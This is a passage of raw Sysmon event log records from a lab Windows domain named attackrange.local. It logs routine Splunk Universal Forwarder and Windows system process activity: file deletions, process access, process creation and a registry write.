Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.283{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6FF0F6EA5396604E86557A3C273834A,SHA256=959065E72C86E272C7DD0D3AFAEABAE960750208888BBC33957F6C0E11CD7280,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.001{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16095B8A3B7AE80A36B5F88858AC3D0D,SHA256=EAAEE4C06C956269A1063D48B3B3C397D86960C4509209838B692D5161DD43C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808404Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:52.505{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06177829C740D14B30F40C7A549DAC45,SHA256=17ADDD1774E3958EEC5E1902EA1502E77F811A0AA624A77A24D981FBF697AD4A,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001050526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:56:52.978{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d776f3-0x7a2fa31c) 10341000x80000000000000001050525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.831{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5C4-60EB-617D-00000000CF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.831{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.831{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.816{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.816{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.816{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5C4-60EB-617D-00000000CF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.816{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5C4-60EB-617D-00000000CF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.817{466BC892-F5C4-60EB-617D-00000000CF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.463{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C4426644BBC5AC52A46364CBE33C1962,SHA256=61C2283EECCBA3BA8096CF5A91153905E6E0D5D9071266B0E7C7233D18C779F3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.147{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5C4-60EB-607D-00000000CF01}9828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.132{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.132{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.132{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.132{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.132{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F5C4-60EB-607D-00000000CF01}9828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.132{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5C4-60EB-607D-00000000CF01}9828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.133{466BC892-F5C4-60EB-607D-00000000CF01}9828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.018{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2097F739BECB03DEEAA56168C2C55B3,SHA256=A1BD38C12F2C30199D3D95BC63553935C44F68B20D19CAF4824AA1236388B355,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808406Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:53.507{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=062E479E6672D75B93614143C311DCCE,SHA256=DD5E7CA8FDA85E1E071DC42DE7CF7A5A8C759AF5A5667BACB020B952BB2FB47B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.816{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=14917E337FF3553F603AEB53BCE012E2,SHA256=E0342D4AA821B6CC11731AF146DB9E7D51B1BEE99C1DA2EBC190ECE215E9CA35,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.748{466BC892-F5C5-60EB-627D-00000000CF01}53365944C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.516{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5C5-60EB-627D-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.501{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.501{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.501{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.501{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.501{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5C5-60EB-627D-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.501{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5C5-60EB-627D-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program 